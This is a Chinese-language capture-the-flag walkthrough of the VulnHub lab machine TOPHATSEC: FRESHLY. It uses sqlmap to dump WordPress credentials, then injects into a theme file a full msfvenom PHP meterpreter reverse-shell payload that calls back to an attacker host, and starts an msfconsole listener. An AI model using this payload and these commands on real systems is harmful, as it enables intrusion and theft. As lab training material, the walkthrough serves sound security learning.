VulnHub渗透测试实战靶场 - TOPHATSEC: FRESHLY

Posted H3rmesk1t

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了VulnHub渗透测试实战靶场 - TOPHATSEC: FRESHLY相关的知识,希望对你有一定的参考价值。

VulnHub渗透测试实战靶场 - TOPHATSEC: FRESHLY

环境下载

戳此进行环境下载

TOPHATSEC: FRESHLY靶机搭建

具体步骤参考VirtualBox(Host only)和VMware共用同一虚拟网卡

  • 将下载好的靶机环境,导入VritualBox,设置为Host-Only模式
  • 将VMware中桥接模式网卡设置为VritualBox的Host-only

渗透测试

信息搜集

arp-scan探测一下目标靶机的IP:sudo arp-scan -l

用nmap探测一下目标靶机IP的信息:sudo nmap -sS -A 192.168.56.104

漏洞挖掘

分别查看一下探测到的三个开放端口



进一步测试发现现8080和443端口都使用了WordPress

dirsearch扫描一下80端口:python3 dirsearch.py -u 192.168.56.104 -e *.php

访问http://192.168.56.104/login.php,用burpsuite抓包将内容保存下来,利用sqlmap测试后发现存在SQL注入漏洞

  • 利用sqlmap跑出数据库名:sqlmap -r sql --dump-all

  • 利用sqlmap跑出wordpress8080数据库中的表名:sqlmap -r sql -D wordpress8080 --tables

  • 利用sqlmap跑出users表中的字段名:sqlmap -r sql -D wordpress8080 -T users --columns

  • 利用sqlmap跑出wordpress8080数据库中users表中的数据:sqlmap -r sql -D wordpress8080 -T users -C username,password --dump

得到用户名和密码:admin:SuperSecretPassword
登录8080端口的web页面:http://192.168.56.104/login.php

wordpress有两种方式拿shell

  • 添加插件,将准备好的格式正确的shell添加到.zip上传
  • 直接编辑

getshell

进入页面:http://192.168.56.104:8080/wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentythirteen
用msfvenom生成一个php反弹shell的木马:msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=1234 R > shell.php

shell内容

/*<?php /**/ error_reporting(0); $ip = '192.168.56.102'; $port = 1234; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

将shell插入命令执行漏洞页面,访问http://192.168.56.104:8080/wordpress/wp-content/themes/twentythirteen/404.php,成功触发恶意代码


用msfconsole起一个监听

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.56.102
set lport 1234
run

再次访问http://192.168.56.104:8080/wordpress/wp-content/themes/twentythirteen/404.php,成功反弹shell

提权

查看/etc/passwd、用户组

发现可以直接su提权到root

以上是关于VulnHub渗透测试实战靶场 - TOPHATSEC: FRESHLY的主要内容,如果未能解决你的问题,请参考以下文章

VulnHub渗透测试实战靶场 - NULLY CYBERSECURITY: 1

VulnHub渗透测试实战靶场-HA: FORENSICS

VulnHub渗透测试实战靶场 - FUNBOX: CTF

VulnHub渗透测试实战靶场 - Funbox: GaoKao

VulnHub渗透测试实战靶场 - DevContainer:1

VulnHub渗透测试实战靶场 - Funbox: GaoKao